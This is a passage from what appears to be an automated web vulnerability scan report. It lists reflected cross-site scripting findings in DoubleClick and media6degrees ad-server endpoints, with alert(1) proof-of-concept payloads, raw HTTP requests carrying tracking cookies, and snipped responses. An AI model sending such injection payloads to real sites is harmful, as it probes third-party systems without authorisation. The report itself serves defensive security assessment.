Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f21e"-alert(1)-"c1a80b55da6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

3.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92ab7'-alert(1)-'6d6e3b013b3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

3.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3faad"-alert(1)-"dcba53557ab was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

3.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22cba'-alert(1)-'0a0ea759385 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

3.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eaaa'%3balert(1)//62bc3773dd1 was submitted in the type parameter. This input was echoed as 9eaaa';alert(1)//62bc3773dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/uk.reuters/news/lifestyle/article;type=9eaaa'%3balert(1)//62bc3773dd1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:35:57 GMT
Expires: Mon, 14 Feb 2011 01:35:57 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/a;44306;0-0;0;46373374;39648-768/768;0/0/0;;~okv=;type=9eaaa';alert(1)//62bc3773dd1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d2cc'-alert(1)-'80eb2a6b3f6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/wpni.politics/inlinead;ad=5d2cc'-alert(1)-'80eb2a6b3f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:38:09 GMT
Expires: Mon, 14 Feb 2011 01:43:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/u;236054673;0-0;0;20580498;255-0/0;40598846/40616633/1;;~okv=;ad=5d2cc'-alert(1)-'80eb2a6b3f6;~aopt=2/0/a8/0;~sscs=%3fhttp://www.c-span.org/Series/Washington-Journal/">
...[SNIP]...

3.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdefb"-alert(1)-"6a122e04d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=4330ojdlggtq20000000b170911gvlggtq20000000b17090yujlginvd0000000817080jv3lginvd0000000817080e0flggrmr0000000c17090x1blebnns1wj3q01411000yielginvd0000000817080yiflginvd0000000817080oj6lggtq20000000b17090e08lggtq20000000b170910qflginvq0000000717070e0nlgevbm0000000e17090w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000b17090j4ilew2e20000001r17090khalggtq20000000b17091196lfzx0l0000001417091195lg7rdq0000000v17090jillebnns1wj3q01411001194lg3y5y0000001117090z14lggtq20000000b17090zgdlggtq20000000b17090faalggtq20000000b17090z13lgio080000000217021193lgiiin0000000917091192lg5l2h0000001017090jprlginvd0000000817080w2klggtq20000000b17090yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001t17090mmnlebnns1wj3q01411000xwhlggtq20000000b17091004lginvd0000000817080z02lggtq20000000b17090kbzlggtq20000000b17090eh5lf17qf0000001p17090kkclggtq20000000b170906bylemlne0000001v17090df5lgcqt50000000j1709111xlggtq20000000b17090mn2lginvd0000000817080mn1lginvd0000000817080swvlggtq20000000b1709100plggtq20000000b17090im3lgcqt50000000j17090yzglginxj0000000517050b6mlf17qk0000001o17090y63lg93og0000000o17090xvslebnns1wj3q01411000o5alggtq20000000b17090yyxlginvu0000000617060yywlginzk0000000317030x1jlebnns1wj3q01411000xwclginvd0000000817080o4plginvd0000000817080yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000b17090yyelginyj0000000417040fullf8gij0000001l170910f6lg1nei00000013170900c9lfk1rn0000001i17090y7blg94wv0000000m17090jsalggtq20000000b170906pklginvd0000000817080cajlfk1rn0000001i17090p7vlebnns1xgc001b120010tylg60ji0000000w170910ellg1nei07gla00h120010eklggtq20000000b17090xuklebnns2219101x170911k3lginvd00000008170810telg60j60000000y170910e9lg1nei0000001317090xtblggtq20000000b170910e2lggtq20000000b17090mivlgismk0000000117010yw4lggtq20000000b170910e4lginvd00000008170810e5lg1nei00000013170910rdlg1vir087mk01217090xt3lggtq20000000b17090mzklgcsh70000000h17090agalggtq20000000b17090agblggtq20000000b17090mzqlgcsgy0000000i17090loxlginvd00000008170807gmlebnns1wj3q01411000kfalginvd0000000817080xthlebnns1xgc001b12000xtflggtq20000000b17090za2lginvd0000000817080za1lginvd00000008170807gqlggtq20000000b17090ovwlginvd0000000817080lw4lginvd0000000817080fuqlegh2b0000001w17090lw3lggtq20000000b17090l24lginvd0000000817080mz1lebnns1wj3q01411000l25lggtq20000000b170907vglfk1rn0tn5601i17090jk7lebnns1wj3q01411000cbnlfk1rn0tn5601i17090e11lggwth0000000a1709; sglst=21k0s8dtlggrmr01w8m00c1709070c20c8kmlggrmr01w8m00c1709070c20cavtlggrmr0056q00c1709070c20c82hlebnns1ucve00z10000600200avjlggrmr01w8m00c1709070c20c3kilggrmr01w8m00c1709070c20calhlggrmr01w8m00c1709070c20c9bslggrmr01w8m00c1709070c20cab4lebnns2707l01x1709070v21481zlggrmr0056q00c1709070c20c8gxlggrmr0056q00c1709070c20c81ylginvd00000008170807082088gwlginvd0000000817080708208aoklggrmr0056q00c1709070c20caollginvd0000000817080708208b07lggwth01r1w00a1709070a20a7inlginvd00000008170807082088nclginvd0000000817080708208b05lggrmr01w8m00c1709070c20cal1lggrmr01w8m00c1709070c20cbbhlggrmr01w8m00c1709070c20c8wylginvd0000000817080708208b0clfjpei0yygv01j1709070v2148wxlggrmr0056q00c1709070c20c72slggtq201ywi00b1709070b20bahhlginvd00000008170807082088nblggrmr0056q00c1709070c20cahilggrmr0056q00c1709070c20c7gdlgcqt5061tf00j1709070j20jb08lfjpei0yygv01b1700070020040ulggrmr01w8m00c1709070c20caprlggrmr01w8m00c1709070c20c5l4lgcqt5061tf00j1709070j20jaanlebnns1xg0o00o120007002008aelggrmr0056q00c1709070c20c61hlggrmr01w8m00c1709070c20c5b0lf17qo0000001n1709070v214ag2leqh191sblb01u1709070v2143thlggrmr01w8m00c1709070c20c8c9lggrmr0056q00c1709070c20c9z4lggrmr01w8m00c1709070c20cacjlggrmr01w8m00c1709070c20cb1alfjpei0yygv01j1709070v2149mmlggrmr0056q00c1709070c20cb0nlggrmr01w8m00c1709070c20cb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00c1709070c20c0tllegh2b22bk901w1709070v2149cblggrmr0056q00c1709070c20c8bglginvd00000008170807082084wmlggrmr01w8m00c1709070c20c5q8lebnns1ucve00k10000600200acelggrmr01w8m00c1709070c20c45mlfdxmc0000001k1709070v214bhdlginvd0000000817080708208

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdw3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgs01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: rdrlst=43311gvlggtq20000000c18010ojdlggtq20000000c18010yujlginvd0000000918010x1blebnns1wj3q01411000e0flggrmr0000000d18010jv3lginvd0000000918010yielginvd0000000918010yiflginvd0000000918010oj6lggtq20000000c18010e08lggtq20000000c180110qflginvq0000000818010w3clebnns1wj3q01411000e0nlgevbm0000000f18010jv6lebnns1wj3q01411000jv5lggtq20000000c18010j4ilew2e20000001s18010khalggtq20000000c18011196lfzx0l0000001518011195lg7rdq0000000w18010jillebnns1wj3q01411001194lg3y5y0000001218010z14lggtq20000000c18010zgdlggtq20000000c18010faalggtq20000000c18010z13lgio080000000318011193lgiiin0000000a18011192lg5l2h0000001118010jprlginvd0000000918010w2klggtq20000000c18010yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001u18010mmnlebnns1wj3q01411000xwhlggtq20000000c18011004lginvd0000000918010z02lggtq20000000c18010kbzlggtq20000000c18010kkclggtq20000000c18010eh5lf17qf0000001q180106bylemlne0000001w18010df5lgcqt50000000k1801111xlggtq20000000c18010mn2lginvd0000000918010mn1lginvd0000000918010swvlggtq20000000c1801100plggtq20000000c18010im3lgcqt50000000k18010yzglginxj0000000618010b6mlf17qk0000001p18010y63lg93og0000000p18010xvslebnns1wj3q01411000o5alggtq20000000c18010yyxlginvu0000000718010yywlginzk0000000418010x1jlebnns1wj3q01411000xwclginvd0000000918010o4plginvd0000000918010yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000c18010yyelginyj0000000518010fullf8gij0000001m180110f6lg1nei00000014180100c9lfk1rn0000001j18010y7blg94wv0000000n18010jsalggtq20000000c180106pklginvd0000000918010cajlfk1rn0000001j18010p7vlebnns1xgc001b120010tylg60ji0000000x180110ellg1nei07gla00h120010eklggtq20000000c18010xuklebnns2219101y180111k3lginvd00000009180110telg60j60000000z180110e9lg1nei0000001418010xtblggtq20000000c180110e2lggtq20000000c18010mivlgismk0000000218010yw4lggtq20000000c180110e4lginvd00000009180110e5lg1nei00000014180110rdlg1vir087mk01318010xt3lggtq20000000c18010mzklgcsh70000000i18010agalggtq20000000c18010agblggtq20000000c18010mzqlgcsgy0000000j18010loxlginvd00000009180107gmlebnns1wj3q01411000kfalginvd0000000918010xthlebnns1xgc001b12000xtflggtq20000000c18010za2lginvd0000000918010za1lginvd0000000918010ovwlginvd00000009180107gqlggtq20000000c18010lw4lginvd0000000918010fuqlegh2b0000001x18010lw3lggtq20000000c18010mz1lebnns1wj3q01411000l24lginvd0000000918010l25lggtq20000000c180107vglfk1rn0tn5601j18010jk7lebnns1wj3q01411000cbnlfk1rn0tn5601j18010e11lggwth0000000b1801; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
